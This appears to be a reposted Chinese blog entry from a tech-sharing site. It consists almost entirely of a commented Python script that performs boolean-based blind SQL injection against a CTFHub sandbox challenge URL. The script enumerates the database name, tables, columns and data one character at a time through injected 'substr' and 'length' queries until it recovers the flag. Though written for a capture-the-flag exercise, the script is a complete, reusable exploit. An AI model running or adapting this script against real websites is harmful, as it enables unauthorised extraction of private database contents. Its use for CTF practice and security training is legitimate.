标签：脚本 tables name database python url length table 盲注

#导入库 import requests
#设定环境URL，由于每次开启环境得到的URL都不同，需要修改！ url = 'http://challenge-4917924317cea4ec.sandbox.ctfhub.com:10800/' #作为盲注成功的标记，成功页面会显示query_success success_mark = "query_success" #把字母表转化成ascii码的列表，方便便利，需要时再把ascii码通过chr(int)转化成字母 ascii_range = range(ord('a'),1+ord('z')) #flag的字符范围列表，包括花括号、a-z，数字0-9 str_range = [123,125] + list(ascii_range) + list(range(48,58))
#自定义函数获取数据库名长度 def getLengthofDatabase():     #初始化库名长度为1     i = 1     #i从1开始，无限循环库名长度     while True:         new_url = url + "?id=1 and length(database())={}".format(i)         #GET请求         r = requests.get(new_url)         #如果返回的页面有query_success，即盲猜成功即跳出无限循环         if success_mark in r.text:             #返回最终库名长度             return i         #如果没有匹配成功，库名长度+1接着循环         i = i + 1
#自定义函数获取数据库名 def getDatabase(length_of_database):     #定义存储库名的变量     name = ""     #库名有多长就循环多少次     for i in range(length_of_database):         #切片，对每一个字符位遍历字母表         #i+1是库名的第i+1个字符下标，j是字符取值a-z         for j in ascii_range:             new_url = url + "?id=1 and substr(database(),{},1)='{}'".format(i+1,chr(j))             r = requests.get(new_url)             if success_mark in r.text:                 #匹配到就加到库名变量里                 name += chr(j)                 #当前下标字符匹配成功，退出遍历，对下一个下标进行遍历字母表                 break     #返回最终的库名     return name
#自定义函数获取指定库的表数量 def getCountofTables(database):     #初始化表数量为1     i = 1     #i从1开始，无限循环     while True:         new_url = url + "?id=1 and (select count(*) from information_schema.tables where table_schema='{}')={}".format(database,i)         r = requests.get(new_url)         if success_mark in r.text:             #返回最终表数量             return i         #如果没有匹配成功，表数量+1接着循环         i = i + 1
#自定义函数获取指定库所有表的表名长度 def getLengthListofTables(database,count_of_tables):     #定义存储表名长度的列表     #使用列表是考虑表数量不为1，多张表的情况     length_list=[]     #有多少张表就循环多少次     for i in range(count_of_tables):         #j从1开始，无限循环表名长度         j = 1         while True:             #i+1是第i+1张表             new_url = url + "?id=1 and length((select table_name from information_schema.tables where table_schema='{}' limit {},1))={}".format(database,i,j)             r = requests.get(new_url)             if success_mark in r.text:                 #匹配到就加到表名长度的列表                 length_list.append(j)                 break             #如果没有匹配成功，表名长度+1接着循环             j = j + 1     #返回最终的表名长度的列表     return length_list
#自定义函数获取指定库所有表的表名 def getTables(database,count_of_tables,length_list):     #定义存储表名的列表     tables=[]     #表数量有多少就循环多少次     for i in range(count_of_tables):         #定义存储表名的变量         name = ""         #表名有多长就循环多少次         #表长度和表序号（i）一一对应         for j in range(length_list[i]):             #k是字符取值a-z             for k in ascii_range:                 new_url = url + "?id=1 and substr((select table_name from information_schema.tables where table_schema='{}' limit {},1),{},1)='{}'".format(database,i,j+1,chr(k))                 r = requests.get(new_url)                 if success_mark in r.text:                     #匹配到就加到表名变量里                     name = name + chr(k)                     break         #添加表名到表名列表里         tables.append(name)     #返回最终的表名列表     return tables
#自定义函数获取指定表的列数量 def getCountofColumns(table):     #初始化列数量为1     i = 1     #i从1开始，无限循环     while True:         new_url = url + "?id=1 and (select count(*) from information_schema.columns where table_name='{}')={}".format(table,i)         r = requests.get(new_url)         if success_mark in r.text:             #返回最终列数量             return i         #如果没有匹配成功，列数量+1接着循环         i = i + 1
#自定义函数获取指定库指定表的所有列的列名长度 def getLengthListofColumns(database,table,count_of_column):     #定义存储列名长度的变量     #使用列表是考虑列数量不为1，多个列的情况     length_list=[]     #有多少列就循环多少次     for i in range(count_of_column):         #j从1开始，无限循环列名长度         j = 1         while True:             new_url = url + "?id=1 and length((select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1))={}".format(database,table,i,j)             r = requests.get(new_url)             if success_mark in r.text:                 #匹配到就加到列名长度的列表                 length_list.append(j)                 break             #如果没有匹配成功，列名长度+1接着循环             j = j + 1     #返回最终的列名长度的列表     return length_list
#自定义函数获取指定库指定表的所有列名 def getColumns(database,table,count_of_columns,length_list):     #定义存储列名的列表     columns = []     #列数量有多少就循环多少次     for i in range(count_of_columns):         #定义存储列名的变量         name = ""         #列名有多长就循环多少次         #列长度和列序号（i）一一对应         for j in range(length_list[i]):             for k in ascii_range:                 new_url = url + "?id=1 and substr((select column_name from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1),{},1)='{}'".format(database,table,i,j+1,chr(k))                 r = requests.get(new_url)                 if success_mark in r.text:                     #匹配到就加到列名变量里                     name = name + chr(k)                     break         #添加列名到列名列表里         columns.append(name)     #返回最终的列名列表     return columns
#对指定库指定表指定列爆数据（flag） def getData(database,table,column,str_list):     #初始化flag长度为1     j = 1     #j从1开始，无限循环flag长度     while True:         #flag中每一个字符的所有可能取值         for i in str_list:             new_url = url + "?id=1 and substr((select {} from {}.{}),{},1)='{}'".format(column,database,table,j,chr(i))             r = requests.get(new_url)             #如果返回的页面有query_success，即盲猜成功，跳过余下的for循环             if success_mark in r.text:                 #显示flag                 print(chr(i),end="")                 #flag的终止条件，即flag的尾端右花括号                 if chr(i) == "}":                     print()                     return 1                 break         #如果没有匹配成功，flag长度+1接着循环         j = j + 1
#--主函数-- if __name__ == '__main__':     #爆flag的操作     #还有仿sqlmap的UI美化     print("Judging the number of tables in the database...")     database = getDatabase(getLengthofDatabase())     count_of_tables = getCountofTables(database)     print("[+]There are {} tables in this database".format(count_of_tables))     print()     print("Getting the table name...")     length_list_of_tables = getLengthListofTables(database,count_of_tables)     tables = getTables(database,count_of_tables,length_list_of_tables)     for i in tables:         print("[+]{}".format(i))     print("The table names in this database are : {}".format(tables))
    #选择所要查询的表     i = input("Select the table name:")
    if i not in tables:         print("Error!")         exit()
    print()     print("Getting the column names in the {} table......".format(i))     count_of_columns = getCountofColumns(i)     print("[+]There are {} tables in the {} table".format(count_of_columns,i))     length_list_of_columns = getLengthListofColumns(database,i,count_of_columns)     columns = getColumns(database,i,count_of_columns,length_list_of_columns)     print("[+]The column(s) name in {} table is:{}".format(i,columns))
    #选择所要查询的列     j = input("Select the column name:")
    if j not in columns:         print("Error!")         exit()
    print()     print("Getting the flag......")     print("[+]The flag is ",end="")     getData(database,i,j,str_range)

标签：脚本,tables,name,database,python,url,length,table,盲注
来源： https://www.cnblogs.com/heartbeat111/p/16448613.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。